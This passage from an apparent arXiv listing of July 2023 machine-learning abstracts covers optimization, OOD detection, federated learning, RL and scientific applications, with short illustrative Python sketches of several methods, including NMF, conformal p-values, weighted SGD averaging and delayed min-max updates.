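    H = rng.random((r, n)) + 0.1
    eps = 1e-9                        # guards against division by zero
    for _ in range(iters):
        H *= (W.T @ X) / (W.T @ W @ H + eps)
        W *= (X @ H.T) / (W @ H @ H.T + eps)
    return W, H

rng = np.random.default_rng(0)
X = rng.random((30, 2)) @ rng.random((2, 40))  # exactly rank-2, nonnegative
W, H = nmf(X, r=2)
rel_err = np.linalg.norm(X - W @ H) / np.linalg.norm(X)
```

The multiplicative form keeps both factors nonnegative throughout, which is what makes the learned columns interpretable as additive building blocks (motifs).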
    Accelerated stochastic approximation with state-dependent noise. (arXiv:2307.01497v2 [math.OC] UPDATED)
    We consider a class of stochastic smooth convex optimization problems under rather general assumptions on the noise in the stochastic gradient observation. As opposed to the classical problem setting in which the variance of noise is assumed to be uniformly bounded, herein we assume that the variance of stochastic gradients is related to the "sub-optimality" of the approximate solutions delivered by the algorithm. Such problems naturally arise in a variety of applications, in particular, in the well-known generalized linear regression problem in statistics. However, to the best of our knowledge, none of the existing stochastic approximation algorithms for solving this class of problems attain optimality in terms of the dependence on accuracy, problem parameters, and mini-batch size. We discuss two non-Euclidean accelerated stochastic approximation routines--stochastic accelerated gradient descent (SAGD) and stochastic gradient extrapolation (SGE)--which carry a particular duality relationship. We show that both SAGD and SGE, under appropriate conditions, achieve the optimal convergence rate, attaining the optimal iteration and sample complexities simultaneously. However, corresponding assumptions for the SGE algorithm are more general; they allow, for instance, for efficient application of the SGE to statistical estimation problems under heavy tail noises and discontinuous score functions. We also discuss the application of the SGE to problems satisfying quadratic growth conditions, and show how it can be used to recover sparse solutions. Finally, we report on some simulation experiments to illustrate numerical performance of our proposed algorithms in high-dimensional settings.
    Multiple Testing Framework for Out-of-Distribution Detection. (arXiv:2206.09522v4 [stat.ML] UPDATED)
    We study the problem of Out-of-Distribution (OOD) detection, that is, detecting whether a learning algorithm's output can be trusted at inference time. While a number of tests for OOD detection have been proposed in prior work, a formal framework for studying this problem is lacking. We propose a definition for the notion of OOD that includes both the input distribution and the learning algorithm, which provides insights for the construction of powerful tests for OOD detection. We propose a multiple hypothesis testing inspired procedure to systematically combine any number of different statistics from the learning algorithm using conformal p-values. We further provide strong guarantees on the probability of incorrectly classifying an in-distribution sample as OOD. In our experiments, we find that threshold-based tests proposed in prior work perform well in specific settings, but not uniformly well across different types of OOD instances. In contrast, our proposed method that combines multiple statistics performs uniformly well across different datasets and neural networks.
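The conformal-p-value machinery can be sketched directly: rank a test statistic against calibration scores computed on in-distribution data, then combine p-values from several statistics. The combiner below is a simple Bonferroni-on-the-minimum rule, used here as a stand-in for the paper's multiple-testing procedure; the scores are synthetic.

```python
import numpy as np

def conformal_pvalue(cal_scores, test_score):
    """Conformal p-value: the rank of the test statistic among calibration
    scores from in-distribution data (higher score = more atypical).
    Valid by exchangeability, with no distributional assumptions."""
    n = len(cal_scores)
    return (1 + np.sum(cal_scores >= test_score)) / (n + 1)

def bonferroni_combine(pvals):
    """Combine p-values from several statistics; Bonferroni on the minimum
    keeps a valid bound on the in-distribution false-alarm probability."""
    return min(1.0, len(pvals) * min(pvals))

rng = np.random.default_rng(0)
cal = rng.normal(size=1000)               # calibration scores (in-dist)
p_in = conformal_pvalue(cal, 0.0)         # typical sample -> large p-value
p_out = conformal_pvalue(cal, 5.0)        # extreme sample -> small p-value
combined = bonferroni_combine([p_out, conformal_pvalue(cal, 4.0)])
is_ood = combined < 0.05                  # flag as OOD at level 0.05
```

Because each p-value is valid marginally, the combined test controls the probability of wrongly flagging an in-distribution sample, which is the guarantee the paper formalizes.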
    The Effectiveness of World Models for Continual Reinforcement Learning. (arXiv:2211.15944v2 [cs.LG] UPDATED)
    World models power some of the most efficient reinforcement learning algorithms. In this work, we showcase that they can be harnessed for continual learning - a situation when the agent faces changing environments. World models typically employ a replay buffer for training, which can be naturally extended to continual learning. We systematically study how different selective experience replay methods affect performance, forgetting, and transfer. We also provide recommendations regarding various modeling options for using world models. The best set of choices is called Continual-Dreamer, it is task-agnostic and utilizes the world model for continual exploration. Continual-Dreamer is sample efficient and outperforms state-of-the-art task-agnostic continual reinforcement learning methods on Minigrid and Minihack benchmarks.
    Classification and Generation of real-world data with an Associative Memory Model. (arXiv:2207.04827v4 [cs.NE] UPDATED)
    Drawing from memory the face of a friend you have not seen in years is a difficult task. However, if you happen to cross paths, you would easily recognize each other. The biological memory is equipped with an impressive compression algorithm that can store the essential, and then infer the details to match perception. The Willshaw Memory is a simple abstract model for cortical computations which implements mechanisms of biological memories. Using our recently proposed sparse coding prescription for visual patterns, this model can store and retrieve an impressive amount of real-world data in a fault-tolerant manner. In this paper, we extend the capabilities of the basic Associative Memory Model by using a Multiple-Modality framework. In this setting, the memory stores several modalities (e.g., visual, or textual) of each pattern simultaneously. After training, the memory can be used to infer missing modalities when just a subset is perceived. Using a simple encoder-memory-decoder architecture, and a newly proposed iterative retrieval algorithm for the Willshaw Model, we perform experiments on the MNIST dataset. By storing both the images and labels as modalities, a single Memory can be used not only to retrieve and complete patterns but also to classify and generate new ones. We further discuss how this model could be used for other learning tasks, thus serving as a biologically-inspired framework for learning.
    Adapting to Mixing Time in Stochastic Optimization with Markovian Data. (arXiv:2202.04428v3 [cs.LG] UPDATED)
    We consider stochastic optimization problems where data is drawn from a Markov chain. Existing methods for this setting crucially rely on knowing the mixing time of the chain, which in real-world applications is usually unknown. We propose the first optimization method that does not require the knowledge of the mixing time, yet obtains the optimal asymptotic convergence rate when applied to convex problems. We further show that our approach can be extended to: (i) finding stationary points in non-convex optimization with Markovian data, and (ii) obtaining better dependence on the mixing time in temporal difference (TD) learning; in both cases, our method is completely oblivious to the mixing time. Our method relies on a novel combination of multi-level Monte Carlo (MLMC) gradient estimation together with an adaptive learning method.
    The complexity of non-stationary reinforcement learning. (arXiv:2307.06877v1 [cs.LG])
    The problem of continual learning in the domain of reinforcement learning, often called non-stationary reinforcement learning, has been identified as an important challenge to the application of reinforcement learning. We prove a worst-case complexity result, which we believe captures this challenge: Modifying the probabilities or the reward of a single state-action pair in a reinforcement learning problem requires an amount of time almost as large as the number of states in order to keep the value function up to date, unless the strong exponential time hypothesis (SETH) is false; SETH is a widely accepted strengthening of the P $\neq$ NP conjecture. Recall that the number of states in current applications of reinforcement learning is typically astronomical. In contrast, we show that just $\textit{adding}$ a new state-action pair is considerably easier to implement.
    Uncovering Unique Concept Vectors through Latent Space Decomposition. (arXiv:2307.06913v1 [cs.LG])
    Interpreting the inner workings of deep learning models is crucial for establishing trust and ensuring model safety. Concept-based explanations have emerged as a superior approach that is more interpretable than feature attribution estimates such as pixel saliency. However, defining the concepts for the interpretability analysis biases the explanations by the user's expectations on the concepts. To address this, we propose a novel post-hoc unsupervised method that automatically uncovers the concepts learned by deep models during training. By decomposing the latent space of a layer in singular vectors and refining them by unsupervised clustering, we uncover concept vectors aligned with directions of high variance that are relevant to the model prediction, and that point to semantically distinct concepts. Our extensive experiments reveal that the majority of our concepts are readily understandable to humans, exhibit coherency, and bear relevance to the task at hand. Moreover, we showcase the practical utility of our method in dataset exploration, where our concept vectors successfully identify outlier training samples affected by various confounding factors. This novel exploration technique has remarkable versatility to data types and model architectures and it will facilitate the identification of biases and the discovery of sources of error within training data.
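A stripped-down sketch of the decomposition step: the SVD of centered layer activations yields orthonormal candidate concept directions ordered by explained variance, and projections onto them can flag unusual training samples. The unsupervised clustering refinement and any real model are omitted; the activations below are random stand-ins.

```python
import numpy as np

rng = np.random.default_rng(0)
# Hypothetical layer activations: 200 samples x 64 latent dimensions
activations = rng.normal(size=(200, 64))
centered = activations - activations.mean(axis=0)

# Decompose the latent space: right singular vectors are candidate
# concept directions, ordered by the variance they explain.
U, S, Vt = np.linalg.svd(centered, full_matrices=False)
n_concepts = 10
concepts = Vt[:n_concepts]            # (10, 64) unit-norm concept vectors

# Score each sample by its projection onto a concept direction; the
# largest-magnitude projections point to the most atypical samples,
# which is how such vectors can surface confounded training data.
proj = centered @ concepts[0]
outlier_idx = np.argsort(-np.abs(proj))[:5]
```

The orthonormality of the singular vectors is what makes the recovered directions non-redundant candidate concepts.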
    Identifying Early Help Referrals For Local Authorities With Machine Learning And Bias Analysis. (arXiv:2307.06871v1 [cs.LG])
Local authorities in England, such as Leicestershire County Council (LCC), provide Early Help services that can be offered at any point in a young person's life when they experience difficulties that cannot be supported by universal services alone, such as schools. This paper investigates the utilisation of machine learning (ML) to assist experts in identifying families that may need to be referred for Early Help assessment and support. LCC provided an anonymised dataset comprising 14360 records of young people under the age of 18. The dataset was pre-processed, machine learning models were built, and experiments were conducted to validate and test the performance of the models. Bias mitigation techniques were applied to improve the fairness of these models. During testing, while the models demonstrated the capability to identify young people requiring intervention or early help, they also produced a significant number of false positives, especially when constructed with imbalanced data, incorrectly identifying individuals who most likely did not need an Early Help referral. This paper empirically explores the suitability of data-driven ML models for identifying young people who may require Early Help services and discusses their appropriateness and limitations for this task.
    Weighted Averaged Stochastic Gradient Descent: Asymptotic Normality and Optimality. (arXiv:2307.06915v1 [stat.ML])
    Stochastic Gradient Descent (SGD) is one of the simplest and most popular algorithms in modern statistical and machine learning due to its computational and memory efficiency. Various averaging schemes have been proposed to accelerate the convergence of SGD in different settings. In this paper, we explore a general averaging scheme for SGD. Specifically, we establish the asymptotic normality of a broad range of weighted averaged SGD solutions and provide asymptotically valid online inference approaches. Furthermore, we propose an adaptive averaging scheme that exhibits both optimal statistical rate and favorable non-asymptotic convergence, drawing insights from the optimal weight for the linear model in terms of non-asymptotic mean squared error (MSE).
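A toy numpy sketch of weighted iterate averaging on a 1D quadratic with noisy gradients: iterate t receives weight t^power, so later (more accurate) iterates count more. The polynomial weighting, step-size schedule, and noise level here are illustrative, not the paper's optimal weights.

```python
import numpy as np

def weighted_averaged_sgd(grad, x0, steps, lr=0.05, power=1.0, rng=None):
    """Run SGD with step size lr/sqrt(t) and maintain a running
    polynomially weighted average of the iterates."""
    rng = rng or np.random.default_rng(0)
    x = x0
    num, den = 0.0, 0.0
    for t in range(1, steps + 1):
        g = grad(x) + rng.normal(scale=0.5)   # noisy gradient observation
        x = x - lr / np.sqrt(t) * g           # decaying step size
        w = t ** power                        # weight grows with t
        num, den = num + w * x, den + w
    return x, num / den                       # last iterate, weighted average

grad = lambda x: 2.0 * (x - 3.0)   # minimize (x - 3)^2, optimum at x = 3
last, avg = weighted_averaged_sgd(grad, x0=0.0, steps=2000)
```

The averaged solution smooths out the gradient noise that the last iterate still carries, which is the effect the asymptotic-normality analysis quantifies.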
    Ensemble learning for blending gridded satellite and gauge-measured precipitation data. (arXiv:2307.06840v1 [cs.LG])
    Regression algorithms are regularly used for improving the accuracy of satellite precipitation products. In this context, ground-based measurements are the dependent variable and the satellite data are the predictor variables, together with topography factors. Alongside this, it is increasingly recognised in many fields that combinations of algorithms through ensemble learning can lead to substantial predictive performance improvements. Still, a sufficient number of ensemble learners for improving the accuracy of satellite precipitation products and their large-scale comparison are currently missing from the literature. In this work, we fill this specific gap by proposing 11 new ensemble learners in the field and by extensively comparing them for the entire contiguous United States and for a 15-year period. We use monthly data from the PERSIANN (Precipitation Estimation from Remotely Sensed Information using Artificial Neural Networks) and IMERG (Integrated Multi-satellitE Retrievals for GPM) gridded datasets. We also use gauge-measured precipitation data from the Global Historical Climatology Network monthly database, version 2 (GHCNm). The ensemble learners combine the predictions by six regression algorithms (base learners), namely the multivariate adaptive regression splines (MARS), multivariate adaptive polynomial splines (poly-MARS), random forests (RF), gradient boosting machines (GBM), extreme gradient boosting (XGBoost) and Bayesian regularized neural networks (BRNN), and each of them is based on a different combiner. The combiners include the equal-weight combiner, the median combiner, two best learners and seven variants of a sophisticated stacking method. The latter stacks a regression algorithm on the top of the base learners to combine their independent predictions...
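The two simplest combiners mentioned, equal-weight and median, can be shown on hypothetical base-learner predictions; the numbers below are invented, and the point of the example is the median's robustness when one base learner goes badly wrong at a site.

```python
import numpy as np

# Hypothetical monthly precipitation predictions (mm) from six base
# regression learners (columns) at five gauge sites (rows)
base_preds = np.array([
    [80.0, 82.0, 79.0, 85.0, 78.0, 81.0],
    [40.0, 45.0, 43.0, 39.0, 41.0, 60.0],
    [120.0, 118.0, 122.0, 119.0, 121.0, 120.0],
    [15.0, 14.0, 16.0, 15.0, 90.0, 15.0],   # gross outlier at this site
    [55.0, 54.0, 56.0, 55.0, 53.0, 57.0],
])

equal_weight = base_preds.mean(axis=1)      # equal-weight combiner
median_comb = np.median(base_preds, axis=1) # median combiner
```

At the outlier site the equal-weight combiner is dragged to 27.5 mm while the median stays at 15 mm; stacking methods go further by learning a combiner on top of the base predictions.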
    AnuraSet: A dataset for benchmarking Neotropical anuran calls identification in passive acoustic monitoring. (arXiv:2307.06860v1 [cs.SD])
    Global change is predicted to induce shifts in anuran acoustic behavior, which can be studied through passive acoustic monitoring (PAM). Understanding changes in calling behavior requires the identification of anuran species, which is challenging due to the particular characteristics of neotropical soundscapes. In this paper, we introduce a large-scale multi-species dataset of anuran amphibians calls recorded by PAM, that comprises 27 hours of expert annotations for 42 different species from two Brazilian biomes. We provide open access to the dataset, including the raw recordings, experimental setup code, and a benchmark with a baseline model of the fine-grained categorization problem. Additionally, we highlight the challenges of the dataset to encourage machine learning researchers to solve the problem of anuran call identification towards conservation policy. All our experiments and resources can be found on our GitHub repository https://github.com/soundclim/anuraset.
    Towards Learning to Imitate from a Single Video Demonstration. (arXiv:1901.07186v4 [cs.LG] UPDATED)
Agents that can learn to imitate given video observation -- \emph{without direct access to state or action information} -- are more applicable to learning in the natural world. However, formulating a reinforcement learning (RL) agent that facilitates this goal remains a significant challenge. We approach this challenge using contrastive training to learn a reward function comparing an agent's behaviour with a single demonstration. We use a Siamese recurrent neural network architecture to learn rewards in space and time between motion clips while training an RL policy to minimize this distance. Through experimentation, we also find that the inclusion of multi-task data and additional image encoding losses improves the temporal consistency of the learned rewards and, as a result, significantly improves policy learning. We demonstrate our approach on simulated humanoid, dog, and raptor agents in 2D and a quadruped and a humanoid in 3D. We show that our method outperforms current state-of-the-art techniques in these environments and can learn to imitate from a single video demonstration.
    Emergent Neural Network Mechanisms for Generalization to Objects in Novel Orientations. (arXiv:2109.13445v2 [cs.CV] UPDATED)
    The capability of Deep Neural Networks (DNNs) to recognize objects in orientations outside the distribution of the training data is not well understood. We present evidence that DNNs are capable of generalizing to objects in novel orientations by disseminating orientation-invariance obtained from familiar objects seen from many viewpoints. This capability strengthens when training the DNN with an increasing number of familiar objects, but only in orientations that involve 2D rotations of familiar orientations. We show that this dissemination is achieved via neurons tuned to common features between familiar and unfamiliar objects. These results implicate brain-like neural mechanisms for generalization.
    Fast and Functional Structured Data Generators Rooted in Out-of-Equilibrium Physics. (arXiv:2307.06797v1 [cs.LG])
In this study, we address the challenge of using energy-based models to produce high-quality, label-specific data in complex structured datasets, such as population genetics, RNA or protein sequence data. Traditional training methods encounter difficulties due to inefficient Markov chain Monte Carlo mixing, which affects the diversity of synthetic data and increases generation times. To address these issues, we use a novel training algorithm that exploits non-equilibrium effects. This approach, applied to the Restricted Boltzmann Machine, improves the model's ability to correctly classify samples and generate high-quality synthetic data in only a few sampling steps. The effectiveness of this method is demonstrated by its successful application to four different types of data: handwritten digits, mutations of human genomes classified by continental origin, functionally characterized sequences of an enzyme protein family, and homologous RNA sequences from specific taxonomies.
    TinyMetaFed: Efficient Federated Meta-Learning for TinyML. (arXiv:2307.06822v1 [cs.LG])
    The field of Tiny Machine Learning (TinyML) has made substantial advancements in democratizing machine learning on low-footprint devices, such as microcontrollers. The prevalence of these miniature devices raises the question of whether aggregating their knowledge can benefit TinyML applications. Federated meta-learning is a promising answer to this question, as it addresses the scarcity of labeled data and heterogeneous data distribution across devices in the real world. However, deploying TinyML hardware faces unique resource constraints, making existing methods impractical due to energy, privacy, and communication limitations. We introduce TinyMetaFed, a model-agnostic meta-learning framework suitable for TinyML. TinyMetaFed facilitates collaborative training of a neural network initialization that can be quickly fine-tuned on new devices. It offers communication savings and privacy protection through partial local reconstruction and Top-P% selective communication, computational efficiency via online learning, and robustness to client heterogeneity through few-shot learning. The evaluations on three TinyML use cases demonstrate that TinyMetaFed can significantly reduce energy consumption and communication overhead, accelerate convergence, and stabilize the training process.
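The Top-P% selective communication idea can be sketched roughly, under the assumption that each client transmits only the largest-magnitude entries of its local weight update; all names and values below are illustrative, not TinyMetaFed's actual protocol:

```python
def top_p_select(delta, p):
    """Keep only the top p fraction of update entries by magnitude;
    the rest stay local, saving communication on constrained devices."""
    k = max(1, int(len(delta) * p))
    keep = sorted(range(len(delta)), key=lambda i: abs(delta[i]), reverse=True)[:k]
    return {i: delta[i] for i in keep}  # sparse message: index -> value

delta = [0.01, -0.50, 0.03, 0.20, -0.02]  # hypothetical local weight update
msg = top_p_select(delta, p=0.4)          # transmit only 40% of entries
print(msg)
```

Transmitting a sparse index-value map instead of the dense update is one plausible way to realize the communication savings the abstract describes.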
    Enhancing Reliability in Federated mmWave Networks: A Practical and Scalable Solution using Radar-Aided Dynamic Blockage Recognition. (arXiv:2307.06834v1 [cs.NI])
This article introduces a new method to improve the dependability of millimeter-wave (mmWave) and terahertz (THz) network services in dynamic outdoor environments. In these settings, line-of-sight (LoS) connections are easily interrupted by moving obstacles like humans and vehicles. The proposed approach, coined as Radar-aided Dynamic blockage Recognition (RaDaR), leverages radar measurements and federated learning (FL) to train a dual-output neural network (NN) model capable of simultaneously predicting blockage status and time. This enables determining the optimal point for proactive handover (PHO) or beam switching, thereby reducing the latency introduced by 5G new radio procedures and ensuring high quality of experience (QoE). The framework employs radar sensors to monitor and track object movement, generating range-angle and range-velocity maps that are useful for scene analysis and predictions. Moreover, FL provides additional benefits such as privacy protection, scalability, and knowledge sharing. The framework is assessed using an extensive real-world dataset comprising mmWave channel information and radar data. The evaluation results show that RaDaR substantially enhances network reliability, achieving an average success rate of 94% for PHO compared to existing reactive HO procedures that lack proactive blockage prediction. Additionally, RaDaR maintains a superior QoE by ensuring sustained high throughput levels and minimising PHO latency.
    Provable Multi-Task Representation Learning by Two-Layer ReLU Neural Networks. (arXiv:2307.06887v1 [cs.LG])
    Feature learning, i.e. extracting meaningful representations of data, is quintessential to the practical success of neural networks trained with gradient descent, yet it is notoriously difficult to explain how and why it occurs. Recent theoretical studies have shown that shallow neural networks optimized on a single task with gradient-based methods can learn meaningful features, extending our understanding beyond the neural tangent kernel or random feature regime in which negligible feature learning occurs. But in practice, neural networks are increasingly often trained on {\em many} tasks simultaneously with differing loss functions, and these prior analyses do not generalize to such settings. In the multi-task learning setting, a variety of studies have shown effective feature learning by simple linear models. However, multi-task learning via {\em nonlinear} models, arguably the most common learning paradigm in practice, remains largely mysterious. In this work, we present the first results proving feature learning occurs in a multi-task setting with a nonlinear model. We show that when the tasks are binary classification problems with labels depending on only $r$ directions within the ambient $d\gg r$-dimensional input space, executing a simple gradient-based multitask learning algorithm on a two-layer ReLU neural network learns the ground-truth $r$ directions. In particular, any downstream task on the $r$ ground-truth coordinates can be solved by learning a linear classifier with sample and neuron complexity independent of the ambient dimension $d$, while a random feature model requires exponential complexity in $d$ for such a guarantee.
    Domain-Agnostic Tuning-Encoder for Fast Personalization of Text-To-Image Models. (arXiv:2307.06925v1 [cs.CV])
    Text-to-image (T2I) personalization allows users to guide the creative image generation process by combining their own visual concepts in natural language prompts. Recently, encoder-based techniques have emerged as a new effective approach for T2I personalization, reducing the need for multiple images and long training times. However, most existing encoders are limited to a single-class domain, which hinders their ability to handle diverse concepts. In this work, we propose a domain-agnostic method that does not require any specialized dataset or prior information about the personalized concepts. We introduce a novel contrastive-based regularization technique to maintain high fidelity to the target concept characteristics while keeping the predicted embeddings close to editable regions of the latent space, by pushing the predicted tokens toward their nearest existing CLIP tokens. Our experimental results demonstrate the effectiveness of our approach and show how the learned tokens are more semantic than tokens predicted by unregularized models. This leads to a better representation that achieves state-of-the-art performance while being more flexible than previous methods.
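The nearest-token regularization can be illustrated with a toy sketch. The two-dimensional "vocabulary" below is a stand-in for CLIP token embeddings and the quadratic penalty is an assumed form, not the paper's exact loss:

```python
def nearest_token(pred, vocab):
    """Index of the vocabulary embedding closest to the predicted token."""
    dist2 = lambda a, b: sum((x - y) ** 2 for x, y in zip(a, b))
    return min(range(len(vocab)), key=lambda i: dist2(pred, vocab[i]))

def regularization_loss(pred, vocab, lam=0.1):
    """Penalty pulling the predicted embedding toward its nearest existing
    token, keeping it in an editable region of the text-embedding space."""
    j = nearest_token(pred, vocab)
    return lam * sum((p - v) ** 2 for p, v in zip(pred, vocab[j]))

vocab = [[0.0, 0.0], [1.0, 0.0], [0.0, 1.0]]  # stand-in token embeddings
pred = [0.9, 0.1]                             # hypothetical encoder output
print(nearest_token(pred, vocab), regularization_loss(pred, vocab))
```

The design intent is that a predicted concept embedding stays close to the manifold of real tokens, which is what makes the learned token remain editable in prompts.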
    FDAPT: Federated Domain-adaptive Pre-training for Language Models. (arXiv:2307.06933v1 [cs.LG])
    Combining Domain-adaptive Pre-training (DAPT) with Federated Learning (FL) can enhance model adaptation by leveraging more sensitive and distributed data while preserving data privacy. However, few studies have focused on this method. Therefore, we conduct the first comprehensive empirical study to evaluate the performance of Federated Domain-adaptive Pre-training (FDAPT). We demonstrate that FDAPT can maintain competitive downstream task performance to the centralized baseline in both IID and non-IID situations. Furthermore, we propose a novel algorithm, Frozen Federated Domain-adaptive Pre-training (FFDAPT). FFDAPT improves the computational efficiency by 12.1% on average and exhibits similar downstream task performance to standard FDAPT, with general performance fluctuations remaining less than 1%. Finally, through a critical evaluation of our work, we identify promising future research directions for this new research area.
    CLAIMED -- the open source framework for building coarse-grained operators for accelerated discovery in science. (arXiv:2307.06824v1 [cs.AI])
    In modern data-driven science, reproducibility and reusability are key challenges. Scientists are well skilled in the process from data to publication. Although some publication channels require source code and data to be made accessible, rerunning and verifying experiments is usually hard due to a lack of standards. Therefore, reusing existing scientific data processing code from state-of-the-art research is hard as well. This is why we introduce CLAIMED, which has a proven track record in scientific research for addressing the repeatability and reusability issues in modern data-driven science. CLAIMED is a framework to build reusable operators and scalable scientific workflows by supporting the scientist to draw from previous work by re-composing workflows from existing libraries of coarse-grained scientific operators. Although various implementations exist, CLAIMED is programming language, scientific library, and execution environment agnostic.
    Min-Max Optimization under Delays. (arXiv:2307.06886v1 [cs.LG])
    Delays and asynchrony are inevitable in large-scale machine-learning problems where communication plays a key role. As such, several works have extensively analyzed stochastic optimization with delayed gradients. However, as far as we are aware, no analogous theory is available for min-max optimization, a topic that has gained recent popularity due to applications in adversarial robustness, game theory, and reinforcement learning. Motivated by this gap, we examine the performance of standard min-max optimization algorithms with delayed gradient updates. First, we show (empirically) that even small delays can cause prominent algorithms like Extra-gradient (\texttt{EG}) to diverge on simple instances for which \texttt{EG} guarantees convergence in the absence of delays. Our empirical study thus suggests the need for a careful analysis of delayed versions of min-max optimization algorithms. Accordingly, under suitable technical assumptions, we prove that Gradient Descent-Ascent (\texttt{GDA}) and \texttt{EG} with delayed updates continue to guarantee convergence to saddle points for convex-concave and strongly convex-strongly concave settings. Our complexity bounds reveal, in a transparent manner, the slow-down in convergence caused by delays.
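A minimal sketch of GDA with delayed gradient updates on a strongly convex-strongly concave toy objective f(x, y) = x^2/2 + xy - y^2/2 (chosen for illustration, not one of the paper's instances); with a small step size the iterates still approach the saddle point, consistent with the convergence guarantee described above:

```python
def delayed_gda(x0, y0, eta=0.05, delay=3, steps=2000):
    """Gradient Descent-Ascent on f(x, y) = x**2/2 + x*y - y**2/2,
    using gradients computed `delay` iterations ago."""
    hist = [(x0, y0)] * (delay + 1)   # buffer of past iterates
    x, y = x0, y0
    for _ in range(steps):
        xd, yd = hist.pop(0)          # stale iterate from `delay` steps back
        gx, gy = xd + yd, xd - yd     # grad_x f, grad_y f at the stale point
        x, y = x - eta * gx, y + eta * gy
        hist.append((x, y))
    return x, y

x, y = delayed_gda(1.0, -1.0)
print(x, y)  # iterates approach the saddle point (0, 0)
```

Raising `delay` or `eta` slows or destroys this contraction, which mirrors the delay-dependent slow-down the complexity bounds make transparent.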
    Privacy-Utility Trade-offs in Neural Networks for Medical Population Graphs: Insights from Differential Privacy and Graph Structure. (arXiv:2307.06760v1 [cs.LG])
    We initiate an empirical investigation into differentially private graph neural networks on population graphs from the medical domain by examining privacy-utility trade-offs at different privacy levels on both real-world and synthetic datasets and performing auditing through membership inference attacks. Our findings highlight the potential and the challenges of this specific DP application area. Moreover, we find evidence that the underlying graph structure constitutes a potential factor for larger performance gaps by showing a correlation between the degree of graph homophily and the accuracy of the trained model.
    Data-driven Nonlinear Parametric Model Order Reduction Framework using Deep Hierarchical Variational Autoencoder. (arXiv:2307.06816v1 [cs.LG])
A data-driven parametric model order reduction (MOR) method using a deep artificial neural network is proposed. The present network, which is the least-squares hierarchical variational autoencoder (LSH-VAE), is capable of performing nonlinear MOR for the parametric interpolation of a nonlinear dynamic system with a significant number of degrees of freedom. LSH-VAE exploits two major changes to the existing networks: a hierarchical deep structure and a hybrid weighted, probabilistic loss function. The enhancements result in significantly improved accuracy and stability compared with the conventional nonlinear MOR methods, autoencoder, and variational autoencoder. Upon LSH-VAE, a parametric MOR framework is presented based on the spherically linear interpolation of the latent manifold. The present framework is validated and evaluated on three nonlinear and multiphysics dynamic systems. First, the present framework is evaluated on the fluid-structure interaction benchmark problem to assess its efficiency and accuracy. Then, a highly nonlinear aeroelastic phenomenon, limit cycle oscillation, is analyzed. Finally, the present framework is applied to a three-dimensional fluid flow to demonstrate its capability of efficiently analyzing a significantly large number of degrees of freedom. The performance of LSH-VAE is emphasized by comparing its results against those of the widely used nonlinear MOR methods, convolutional autoencoder, and $\beta$-VAE. The present framework exhibits significantly enhanced accuracy compared with the conventional methods while still exhibiting a large speed-up factor.
    PC-Droid: Faster diffusion and improved quality for particle cloud generation. (arXiv:2307.06836v1 [hep-ex])
    Building on the success of PC-JeDi we introduce PC-Droid, a substantially improved diffusion model for the generation of jet particle clouds. By leveraging a new diffusion formulation, studying more recent integration solvers, and training on all jet types simultaneously, we are able to achieve state-of-the-art performance for all types of jets across all evaluation metrics. We study the trade-off between generation speed and quality by comparing two attention based architectures, as well as the potential of consistency distillation to reduce the number of diffusion steps. Both the faster architecture and consistency models demonstrate performance surpassing many competing models, with generation time up to two orders of magnitude faster than PC-JeDi.
    Generalizing Supervised Deep Learning MRI Reconstruction to Multiple and Unseen Contrasts using Meta-Learning Hypernetworks. (arXiv:2307.06771v1 [eess.IV])
Meta-learning has recently emerged as a data-efficient learning technique for various medical imaging operations and has helped advance contemporary deep learning models. Furthermore, meta-learning enhances the knowledge generalization of the imaging tasks by learning both shared and discriminative weights for various configurations of imaging tasks. However, existing meta-learning models attempt to learn a single set of weight initializations of a neural network that might be restrictive for multimodal data. This work aims to develop a multimodal meta-learning model for image reconstruction, which augments meta-learning with evolutionary capabilities to encompass diverse acquisition settings of multimodal data. Our proposed model, called KM-MAML (Kernel Modulation-based Multimodal Meta-Learning), has hypernetworks that evolve to generate mode-specific weights. These weights provide the mode-specific inductive bias for multiple modes by re-calibrating each kernel of the base network for image reconstruction via a low-rank kernel modulation operation. We incorporate gradient-based meta-learning (GBML) in the contextual space to update the weights of the hypernetworks for different modes. The hypernetworks and the reconstruction network in the GBML setting provide discriminative mode-specific features and low-level image features, respectively. Experiments on multi-contrast MRI reconstruction show that our model, (i) exhibits superior reconstruction performance over joint training, other meta-learning methods, and context-specific MRI reconstruction methods, and (ii) better adaptation capabilities with improvement margins of 0.5 dB in PSNR and 0.01 in SSIM. Furthermore, a representation analysis with U-Net shows that kernel modulation infuses 80% of mode-specific representation changes in the high-resolution layers. Our source code is available at https://github.com/sriprabhar/KM-MAML/.
    Robotic surface exploration with vision and tactile sensing for cracks detection and characterisation. (arXiv:2307.06784v1 [cs.RO])
This paper presents a novel algorithm for crack localisation and detection based on visual and tactile analysis via fibre-optics. A finger-shaped sensor based on fibre-optics is employed for the data acquisition to collect data for the analysis and the experiments. To detect the possible locations of cracks, a camera is used to scan an environment while running an object detection algorithm. Once the crack is detected, a fully-connected graph is created from a skeletonised version of the crack. A minimum spanning tree is then employed for calculating the shortest path to explore the crack, which is then used to develop the motion planner for the robotic manipulator. The motion planner divides the crack into multiple nodes which are then explored individually. Then, the manipulator starts the exploration and performs the tactile data classification to confirm if there is indeed a crack in that location or just a false positive from the vision algorithm. If a crack is detected, its length, width, orientation, and number of branches are also calculated. This is repeated until all the nodes of the crack are explored. In order to validate the complete algorithm, various experiments are performed: comparison of exploration of cracks through full scan and motion planning algorithm, implementation of frequency-based features for crack classification and geometry analysis using a combination of vision and tactile data. From the results of the experiments, it is shown that the proposed algorithm is able to detect cracks and improve the results obtained from vision to correctly classify cracks and their geometry with minimal cost thanks to the motion planning algorithm.
    Federated Multi-Agent Deep Reinforcement Learning for Dynamic and Flexible 3D Operation of 5G Multi-MAP Networks. (arXiv:2307.06842v1 [cs.NI])
    This paper addresses the efficient management of Mobile Access Points (MAPs), which are Unmanned Aerial Vehicles (UAV), in 5G networks. We propose a two-level hierarchical architecture, which dynamically reconfigures the network while considering Integrated Access-Backhaul (IAB) constraints. The high-layer decision process determines the number of MAPs through consensus, and we develop a joint optimization process to account for co-dependence in network self-management. In the low-layer, MAPs manage their placement using a double-attention based Deep Reinforcement Learning (DRL) model that encourages cooperation without retraining. To improve generalization and reduce complexity, we propose a federated mechanism for training and sharing one placement model for every MAP in the low-layer. Additionally, we jointly optimize the placement and backhaul connectivity of MAPs using a multi-objective reward function, considering the impact of varying MAP placement on wireless backhaul connectivity.
    Self-consistency for open-ended generations. (arXiv:2307.06857v1 [cs.AI])
